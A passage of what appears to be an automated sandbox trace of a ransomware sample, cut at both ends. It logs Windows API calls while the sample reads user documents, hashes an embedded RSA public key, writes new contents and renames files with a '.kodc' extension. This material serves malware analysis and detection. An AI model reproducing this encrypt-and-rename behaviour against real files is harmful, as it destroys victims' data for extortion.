RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.831] GetCurrentThreadId () returned 0x42c [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abf8 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac10 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abe0 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac28 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abf8 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abf8 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abf8 | out: hHeap=0x630000) returned 1 [0098.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac28 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac10 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abe0 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abc8 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d720 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.834] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xde3b, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xde3b, lpOverlapped=0x0) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.834] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xde40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.834] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.835] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.835] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.835] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.835] CloseHandle (hObject=0x5cc) returned 1 [0098.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.837] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WmeGhCG57Q.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wmeghcg57q.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WmeGhCG57Q.xlsx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wmeghcg57q.xlsx.kodc")) returned 1 [0098.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.837] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.839] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c0b740, ftCreationTime.dwHighDateTime=0x1d555e3, ftLastAccessTime.dwLowDateTime=0x7977f050, ftLastAccessTime.dwHighDateTime=0x1d57883, ftLastWriteTime.dwLowDateTime=0x7977f050, ftLastWriteTime.dwHighDateTime=0x1d57883, nFileSizeHigh=0x0, nFileSizeLow=0xa068, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x6TvOU93J WY9K-S_.pptx", cAlternateFileName="X6TVOU~1.PPT")) returned 1 [0098.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.839] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6TvOU93J WY9K-S_.pptx") returned=".pptx" [0098.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6TvOU93J WY9K-S_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6tvou93j wy9k-s_.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.839] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=41064) returned 1 [0098.839] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.842] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa042, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.842] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.843] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.843] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xa068, lpOverlapped=0x0) returned 1 [0098.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.843] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.844] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.844] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.844] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.844] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.844] GetLastError () returned 0x0 [0098.844] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.844] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.844] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.844] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.844] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa070) returned 0x9ba4d90 [0098.845] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d720 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abc8 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d768 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abe0 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac10 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac28 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.845] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac10 | out: hHeap=0x630000) returned 1 [0098.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac28 | out: hHeap=0x630000) returned 1 [0098.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac28 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ac10 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac28 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac10 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.846] HeapFree (in: hHeap=0x630000, 